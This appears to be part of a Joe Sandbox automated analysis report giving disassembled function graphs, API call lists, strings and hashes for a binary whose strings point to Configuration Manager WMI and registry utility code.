5b2c72-5b2c93 GetCurrentThreadId 870->876 877 5b2cfe-5b2d1f call 60bc69 871->877 878 5b2cc0-5b2ccd call 5f0b53 871->878 876->871 884 5b2d5f-5b2d72 GetComputerNameW 877->884 885 5b2d21-5b2d2e call 5f0b53 877->885 878->799 883 5b2cd3-5b2cf4 GetCurrentThreadId 878->883 883->877 887 5b2d93-5b2d9c call 5f3b94 884->887 888 5b2d74-5b2d88 GetLastError 884->888 885->799 891 5b2d34-5b2d55 GetCurrentThreadId 885->891 893 5b2d9e-5b2dfc call 592624 887->893 894 5b2e04-5b2e49 call 5a0397 call 5bc97e call 5a0c32 call 59f5fe 887->894 888->887 891->884 897 5b2e01 893->897 905 5b2e4b-5b2e5c GetSystemMetrics 894->905 906 5b2e5e 894->906 897->894 905->906 907 5b2e64-5b2e97 call 59ef10 905->907 906->907 910 5b2e99-5b2ea1 call 5f3b94 907->910 911 5b2ec4 call 5fb867 907->911 910->911 916 5b2ea3-5b2ec3 call 592624 910->916 915 5b2ec9-5b2ecb 911->915 917 5b2ef8-5b2f03 915->917 918 5b2ecd-5b2ef5 call 5f567f 915->918 916->911 921 5b2f0a-5b2f11 917->921 922 5b2f05 call 5f0dba 917->922 918->917 921->805 922->921
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005B2927
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 005B14FC: __EH_prolog3.LIBCMT ref: 005B1503
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2A0C
                                                                                            • Part of subcall function 0060C143: __EH_prolog3_catch.LIBCMT ref: 0060C14A
                                                                                            • Part of subcall function 0060C143: GetCurrentThreadId.KERNEL32 ref: 0060C1A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2A90
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2AEA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2B67
                                                                                            • Part of subcall function 0060BC69: __EH_prolog3_catch.LIBCMT ref: 0060BC70
                                                                                            • Part of subcall function 0060BC69: GetCurrentThreadId.KERNEL32 ref: 0060BCCC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2BC5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2C26
                                                                                            • Part of subcall function 0060BC69: GetCurrentThreadId.KERNEL32 ref: 0060BD34
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2C87
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2CE8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2D49
                                                                                          • GetComputerNameW.KERNEL32(?,00000010), ref: 005B2D6A
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,000000E4,005968DA,?), ref: 005B2D74
                                                                                          • GetSystemMetrics.USER32(00000059), ref: 005B2E4D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catchH_prolog3_catch_$ComputerErrorLastMetricsNameSystem
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$5.2$Caption$CheckAndLogOSInformation$CheckAndLogOSInformation failed with 0x%x$Client OS (%s). Service Pack (%d.%d)$OSType$ServicePackMajorVersion$ServicePackMinorVersion$SuiteMask$This is Windows Server 2003 R2.$Version$WBEM_NO_ERROR == spEnum.Next(&spObject)$[%s] Running on '%s' (%s). Service Pack (%d.%d). SuiteMask = %d. Product Type = %d$root\cimv2$select * from Win32_OperatingSystem$spCimV2.Open(szCimV2)$spCimV2.Query(szQuery, &spEnum)$spObject.GetDword(L"OSType", dwType)$spObject.GetDword(L"ServicePackMajorVersion", dwSPMajor)$spObject.GetDword(L"ServicePackMinorVersion", dwSPMinor)$spObject.GetDword(L"SuiteMask", dwSuite)$spObject.GetString(L"Caption", sOSCaption)$spObject.GetString(L"Version", sOSVersion)$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$m
                                                                                          • API String ID: 2778888534-3825638199
                                                                                          • Opcode ID: 624dcce0227587d46f3ce678aacc30acd0b324247e3e73de65fd82d54af90c23
                                                                                          • Instruction ID: 1e0b097ef497495fa2860b8a13922075bc9f3bc9b20754f3285d1a45a4f07d2d
                                                                                          • Opcode Fuzzy Hash: 624dcce0227587d46f3ce678aacc30acd0b324247e3e73de65fd82d54af90c23
                                                                                          • Instruction Fuzzy Hash: 5AF18070E41368AEDB20EB90CD46BEE7F7ABB15B44F104096F509BB2C1D7B15A84CB61
                                                                                          Function 0060B3E1 Relevance: 108.8, APIs: 18, Strings: 44, Instructions: 329threadtimeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 926 60b3e1-60b423 call 5d22f4 call 6743a3 931 60b425-60b436 call 5f0b53 926->931 932 60b478-60b47a 926->932 941 60b462-60b468 931->941 942 60b438-60b453 GetCurrentThreadId 931->942 934 60b4b1-60b4b3 932->934 935 60b47c-60b48d call 5f0b53 932->935 936 60b4b5-60b4c6 call 5f0b53 934->936 937 60b4ed-60b529 call 6092a8 call 609305 934->937 935->941 945 60b48f-60b4af GetCurrentThreadId 935->945 936->941 951 60b4c8-60b4e8 GetCurrentThreadId 936->951 961 60b560-60b564 937->961 962 60b52b-60b535 call 5f0b53 937->962 949 60b46a call 5f0dba 941->949 950 60b46f-60b473 941->950 947 60b458-60b45f call 5f1811 942->947 945->947 947->941 949->950 954 60b819-60b820 call 5d2246 950->954 951->947 963 60b668 961->963 964 60b56a-60b570 961->964 962->941 969 60b53b-60b556 GetCurrentThreadId 962->969 967 60b66b-60b66f 963->967 964->963 966 60b576-60b57f 964->966 966->967 970 60b585-60b598 call 61060c 966->970 967->941 971 60b675 967->971 969->961 976 60b59a-60b5a4 call 5f0b53 970->976 977 60b5cf-60b5dd VariantClear 970->977 973 60b67a-60b683 971->973 973->941 975 60b689-60b68c 973->975 975->941 978 60b692-60b69d 975->978 976->941 995 60b5aa-60b5c5 GetCurrentThreadId 976->995 982 60b614-60b62a SystemTimeToVariantTime 977->982 983 60b5df-60b5e9 call 5f0b53 977->983 979 60b6a9-60b6ac 978->979 980 60b69f-60b6a6 978->980 984 60b6b2-60b6b8 979->984 985 60b7b4-60b7c5 VariantChangeType 979->985 980->979 986 60b677 982->986 987 60b62c-60b63d call 5f0b53 982->987 983->941 996 60b5ef-60b60a GetCurrentThreadId 983->996 991 60b739-60b763 call 66c9e8 VariantClear 984->991 992 60b6ba-60b6be 984->992 985->941 994 60b7cb-60b7d5 call 5f0b53 985->994 986->973 987->941 1002 60b643-60b65e GetCurrentThreadId 987->1002 1005 60b765-60b76f call 5f0b53 991->1005 1006 60b79d-60b7a9 991->1006 992->985 997 60b6c4-60b6ee call 66c9e8 VariantClear 992->997 994->941 1008 60b7db-60b7f9 GetCurrentThreadId 994->1008 995->977 996->982 1011 60b6f0-60b6fa call 5f0b53 997->1011 1012 60b728-60b737 997->1012 1002->963 1005->941 1015 60b775-60b793 GetCurrentThreadId 1005->1015 1010 60b7ac-60b7af 1006->1010 1008->954 1010->941 1011->941 1017 60b700-60b71e GetCurrentThreadId 1011->1017 1012->1010 1015->1006 1017->1012
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0060B3E8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B44A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B4A1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B4DA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B54D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B5BC
                                                                                          • VariantClear.OLEAUT32(?), ref: 0060B5D0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B601
                                                                                          • SystemTimeToVariantTime.OLEAUT32(00000078,00000000), ref: 0060B622
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B655
                                                                                          • _swscanf.LIBCMT ref: 0060B6D8
                                                                                          • VariantClear.OLEAUT32(?), ref: 0060B6E1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B716
                                                                                          • _swscanf.LIBCMT ref: 0060B74D
                                                                                            • Part of subcall function 0066C9E8: _vscan_fn.LIBCMT ref: 0066C9FC
                                                                                          • VariantClear.OLEAUT32(?), ref: 0060B756
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B78B
                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000000), ref: 0060B7B8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B7F1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Variant$Clear$Time_swscanf$ChangeH_prolog3_catch_SystemType_vscan_fn
                                                                                          • String ID: %I64d$%I64u$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$CCM::Utility::Wmi::Object::Get$CIMTimeToSystemTime(pvValue->bstrVal, &SystemTime)$SystemTimeToVariantTime(&SystemTime, &pvValue->date)$VariantChangeType( pvValue, pvValue, uFlags, vtResultType )$VariantClear(pvValue)$VariantClear(pvValue)$VariantClear(pvValue)$e$getPointer()->Get( BString(pszName), 0, pvValue, &ctPropType, 0 )$null() == false$pszName != 0$pvValue != 0
                                                                                          • API String ID: 2801586293-3046096493
                                                                                          • Opcode ID: 9e8ca537f7b4c798198519c6b0c9f7ebef9e7b43e053e1a597c1d174aa3b7005
                                                                                          • Instruction ID: db509c90831ad0a0d9637732f0212d3308e60d09084c0c21e60699f978f8a63e
                                                                                          • Opcode Fuzzy Hash: 9e8ca537f7b4c798198519c6b0c9f7ebef9e7b43e053e1a597c1d174aa3b7005
                                                                                          • Instruction Fuzzy Hash: 77B102B1AC0344BACB249F60CC46EFE7BA6AF58B11F14E106FD04B73C2C7A559068B65
                                                                                          Function 005F954D Relevance: 103.6, APIs: 11, Strings: 48, Instructions: 343threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1018 5f954d-5f95d4 call 5d22f4 call 6013b4 call 5b14fc call 60b178 call 5f419f call 6743a3 call 603360 1033 5f9626-5f9646 call 5c6026 call 603b66 1018->1033 1034 5f95d6-5f95e0 call 5f0b53 1018->1034 1046 5f9679-5f968c call 5c6026 call 5ba395 1033->1046 1047 5f9648-5f9652 call 5f0b53 1033->1047 1040 5f960e-5f9616 1034->1040 1041 5f95e2-5f9600 GetCurrentThreadId 1034->1041 1044 5f961d-5f9621 1040->1044 1045 5f9618 call 5f0dba 1040->1045 1043 5f9605-5f960b call 5f1811 1041->1043 1043->1040 1050 5f99b0-5f99e9 call 59f01d call 59ef10 call 5b15e4 call 5b15af call 577fd4 1044->1050 1045->1044 1064 5f968e-5f969d call 5f0b53 1046->1064 1065 5f96cb-5f96e3 call 60c143 1046->1065 1047->1040 1058 5f9654-5f9677 GetCurrentThreadId 1047->1058 1079 5f99ee-5f99f5 call 5d2246 1050->1079 1058->1043 1064->1040 1072 5f96a3-5f96c6 GetCurrentThreadId 1064->1072 1073 5f971d-5f9735 call 5f646b 1065->1073 1074 5f96e5-5f96ef call 5f0b53 1065->1074 1072->1043 1084 5f976f-5f9780 1073->1084 1085 5f9737-5f9741 call 5f0b53 1073->1085 1074->1040 1083 5f96f5-5f9713 GetCurrentThreadId 1074->1083 1083->1073 1086 5f97bf-5f97c3 1084->1086 1087 5f9782-5f9791 call 5f0b53 1084->1087 1085->1040 1096 5f9747-5f9765 GetCurrentThreadId 1085->1096 1091 5f97c7-5f97db call 5d499a 1086->1091 1092 5f97c5 1086->1092 1087->1040 1097 5f9797-5f97b5 GetCurrentThreadId 1087->1097 1099 5f97df-5f97f3 call 5d499a 1091->1099 1100 5f97dd 1091->1100 1092->1091 1096->1084 1097->1086 1103 5f97f7-5f9814 call 5d499a call 60bc69 1099->1103 1104 5f97f5 1099->1104 1100->1099 1108 5f9819-5f9820 1103->1108 1104->1103 1109 5f985a-5f987d call 60bc69 1108->1109 1110 5f9822-5f982c call 5f0b53 1108->1110 1116 5f987f-5f9889 call 5f0b53 1109->1116 1117 5f98b7-5f98da call 60bc69 1109->1117 1110->1040 1115 5f9832-5f9850 GetCurrentThreadId 1110->1115 1115->1109 1116->1040 1122 5f988f-5f98ad GetCurrentThreadId 1116->1122 1123 5f98dc-5f98e6 call 5f0b53 1117->1123 1124 5f9914-5f9937 call 60bc69 1117->1124 1122->1117 1123->1040 1129 5f98ec-5f990a GetCurrentThreadId 1123->1129 1130 5f9939-5f9943 call 5f0b53 1124->1130 1131 5f9971-5f9982 1124->1131 1129->1124 1130->1040 1137 5f9949-5f9967 GetCurrentThreadId 1130->1137 1132 5f9989-5f9990 1131->1132 1133 5f9984 call 5f0dba 1131->1133 1132->1050 1133->1132 1137->1131
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F9554
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 005B14FC: __EH_prolog3.LIBCMT ref: 005B1503
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F95F8
                                                                                            • Part of subcall function 005F646B: __EH_prolog3_catch_GS.LIBCMT ref: 005F6472
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F966A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F96B9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F970B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F975D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F97AD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F9848
                                                                                            • Part of subcall function 0060BC69: __EH_prolog3_catch.LIBCMT ref: 0060BC70
                                                                                            • Part of subcall function 0060BC69: GetCurrentThreadId.KERNEL32 ref: 0060BCCC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F98A5
                                                                                            • Part of subcall function 0060BC69: GetCurrentThreadId.KERNEL32 ref: 0060BD34
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F9902
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F995F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$CCM::Utility::CcmGetOSVersionEx$OSProductSuite$ProductType$ServicePackMajorVersion$ServicePackMinorVersion$Version$WBEM_NO_ERROR == spEnum.Next(&spObject)$root\cimv2$sVersion.tokenize(L".", saTokens)$saTokens.size() >= 3$select * from Win32_OperatingSystem$spObject.GetDword(c_szWmi_OSProductSuite, dwTemp)$spObject.GetDword(c_szWmi_ProductType, dwTemp)$spObject.GetDword(c_szWmi_SPMajorVersion, dwTemp)$spObject.GetDword(c_szWmi_SPMinorVersion, dwTemp)$spObject.GetString( c_szWmi_Version, sVersion )$spWin32NS.Open(L"root\\cimv2")$spWin32NS.Query(c_szWmi_Win32OS_Query, &spEnum)
                                                                                          • API String ID: 3275092694-2116823972
                                                                                          • Opcode ID: 7881fbcef15334c7ebb0cbb65846dc19c68b60691cb41700fd1184aac20e490c
                                                                                          • Instruction ID: f7213359bdd7eb607a1b2270c45136774eadb014ef3f1632821051983e1b288e
                                                                                          • Opcode Fuzzy Hash: 7881fbcef15334c7ebb0cbb65846dc19c68b60691cb41700fd1184aac20e490c
                                                                                          • Instruction Fuzzy Hash: 30C1D3B0D407A8ABCB11EFA4DD49EEE7F79BF91B04F144009F504AB292CB785905CBA1
                                                                                          Function 005F99F8 Relevance: 91.4, APIs: 18, Strings: 34, Instructions: 394registrythreadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1138 5f99f8-5f9a14 call 5d22f4 1141 5f9a16-5f9a4f call 5d0e41 1138->1141 1142 5f9a51 1138->1142 1144 5f9a53-5f9a5a 1141->1144 1142->1144 1146 5f9f41-5f9f46 call 5d2246 1144->1146 1147 5f9a60-5f9a62 1144->1147 1149 5f9a6e-5f9a76 1147->1149 1150 5f9a64-5f9a69 1147->1150 1152 5f9a8c-5f9add call 6743a3 RegOpenKeyExW 1149->1152 1153 5f9a78-5f9a87 1149->1153 1150->1146 1157 5f9adf-5f9af7 call 5f0b53 1152->1157 1158 5f9b3d-5f9b5a RegQueryValueExW 1152->1158 1153->1146 1167 5f9af9-5f9b17 GetCurrentThreadId 1157->1167 1168 5f9b25-5f9b2d 1157->1168 1160 5f9b5c-5f9b74 call 5f0b53 1158->1160 1161 5f9b9b-5f9b9f 1158->1161 1160->1168 1171 5f9b76-5f9b99 GetCurrentThreadId 1160->1171 1162 5f9bde-5f9c06 call 5f419f * 2 call 5fae3f 1161->1162 1163 5f9ba1-5f9bb0 call 5f0b53 1161->1163 1191 5f9c6c-5f9c87 call 5f511f 1162->1191 1192 5f9c08-5f9c12 call 5f0b53 1162->1192 1163->1168 1177 5f9bb6-5f9bd9 GetCurrentThreadId 1163->1177 1173 5f9b1c-5f9b22 call 5f1811 1167->1173 1175 5f9b2f call 5f0dba 1168->1175 1176 5f9b34-5f9b38 1168->1176 1171->1173 1173->1168 1175->1176 1181 5f9f18-5f9f1c 1176->1181 1177->1173 1184 5f9f1e-5f9f21 RegCloseKey 1181->1184 1185 5f9f27-5f9f29 1181->1185 1184->1185 1186 5f9f2b-5f9f30 1185->1186 1187 5f9f39-5f9f3f 1185->1187 1186->1187 1189 5f9f32-5f9f33 FreeLibrary 1186->1189 1187->1146 1189->1187 1199 5f9c89-5f9c99 1191->1199 1200 5f9ca8-5f9cc7 call 5f4ccf call 605eb4 1191->1200 1197 5f9c14-5f9c40 GetCurrentThreadId call 5f1811 1192->1197 1198 5f9c43-5f9c55 call 59ef10 1192->1198 1197->1198 1210 5f9c59-5f9c67 call 59ef10 1198->1210 1199->1200 1204 5f9c9b-5f9ca3 call 5f4ccf 1199->1204 1213 5f9cec-5f9d19 SetErrorMode LoadLibraryExW 1200->1213 1214 5f9cc9-5f9ce7 call 59ef10 1200->1214 1204->1200 1210->1191 1217 5f9d4e-5f9d5c SetErrorMode 1213->1217 1218 5f9d1b-5f9d4b call 6087ad LoadLibraryExW GetLastError 1213->1218 1214->1210 1221 5f9d5e-5f9d76 call 5f0b53 1217->1221 1222 5f9dc2-5f9dc4 1217->1222 1218->1217 1231 5f9d78-5f9da4 GetCurrentThreadId call 5f1811 1221->1231 1232 5f9da7-5f9db9 call 59ef10 1221->1232 1223 5f9dc6-5f9dd5 call 5f0b53 1222->1223 1224 5f9e21-5f9e2f GetProcAddress 1222->1224 1238 5f9dd7-5f9e03 GetCurrentThreadId call 5f1811 1223->1238 1239 5f9e06-5f9e18 call 59ef10 1223->1239 1227 5f9edf-5f9ef9 call 59ef10 1224->1227 1228 5f9e35-5f9e41 1224->1228 1227->1181 1243 5f9e99-5f9ed6 call 5f7d07 call 5f7de7 call 5ec3d8 call 59ef10 1228->1243 1244 5f9e43-5f9e4d call 5f0b53 1228->1244 1231->1232 1232->1222 1238->1239 1239->1224 1243->1227 1254 5f9e4f-5f9e7b GetCurrentThreadId call 5f1811 1244->1254 1255 5f9e7e-5f9e90 call 59ef10 1244->1255 1254->1255 1255->1243
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F99FF
                                                                                          • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\CCM,00000000,00020019,?,CCM::Utility::CcmGetProfilerInstance,0000006C,005F0A5A,00000000,00000000,00000000,00000180,005F14A6,ConnectedStandby,00000000,?), ref: 005F9AD5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F9B0F
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 005F9F21
                                                                                          • FreeLibrary.KERNEL32(?), ref: 005F9F33
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentFreeH_prolog3_catch_LibraryOpenThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$CCM::Utility::CcmGetProfilerInstance$CCM::Utility::GetCcmDirectory(sCcmPath)$CcmProfiler.dll$EnableProfiling$GetCcmProfiler$RegOpenKeyExW((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Root, 0, ((((0x00020000L)) | (0x0001) | (0x0008) | (0x0010)) &$RegQueryValueExW(hKey, L"EnableProfiling", 0, &uType, (LPBYTE)&dwEnabled, &uSize)$Software\Microsoft\CCM$dwEnabled > 0$dwErr$hModule != 0$hrq$lpfuncGetCcmProfiler(ppProfiler)
                                                                                          • API String ID: 2023098677-3267404283
                                                                                          • Opcode ID: c0fd455861511ff86b2fec0e07ab845655e18fe6e78e06bb5cbf2a42a5c9a2da
                                                                                          • Instruction ID: aacd209cd96e3706bc5888395f64c03e6bb62dc62114713550147f8690d976ca
                                                                                          • Opcode Fuzzy Hash: c0fd455861511ff86b2fec0e07ab845655e18fe6e78e06bb5cbf2a42a5c9a2da
                                                                                          • Instruction Fuzzy Hash: A9E19DB194464CEAEB10DBA4CD49BEEBFB8BF14704F148059F641B7282D7B85A04CB61
                                                                                          Function 0059DAAD Relevance: 89.7, APIs: 10, Strings: 41, Instructions: 427threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
